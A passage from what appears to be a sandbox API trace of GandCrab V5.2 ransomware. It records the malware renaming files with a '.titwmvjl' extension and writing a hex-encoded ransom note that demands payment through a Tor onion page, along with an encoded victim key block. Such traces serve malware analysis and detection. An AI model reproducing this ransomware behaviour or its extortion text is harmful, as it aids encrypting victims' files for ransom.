45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.463] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0072.464] CloseHandle (hObject=0x2c4) returned 1 [0072.464] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.464] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.464] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x309)) [0072.464] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.465] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.465] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.465] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a09d2ca4deb61a.lock") returned 92 [0072.465] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0072.467] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.467] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.467] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 68 [0072.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0072.467] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5037b8 [0072.467] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.467] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.468] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.468] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.468] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.468] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.468] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a09d2ca4deb61a.lock" [0072.468] lstrlenW (lpString=".titwmvjl") returned 9 [0072.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a09d2ca4deb61a.lock") returned 92 [0072.468] VirtualAlloc (lpAddress=0x0, dwSize=0xf8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.468] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 101 [0072.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a09d2ca4deb61a.lock") returned 92 [0072.468] lstrlenW (lpString=".lock") returned 5 [0072.468] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.469] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.469] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.469] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.469] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.469] lstrcmpW (lpString1="Pbk", lpString2=".") returned 1 [0072.469] lstrcmpW (lpString1="Pbk", lpString2="..") returned 1 [0072.469] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="Pbk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0072.469] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0072.469] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.469] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.469] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.470] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.470] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.471] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\TITWMVJL-DECRYPT.txt") returned 93 [0072.471] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0072.472] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53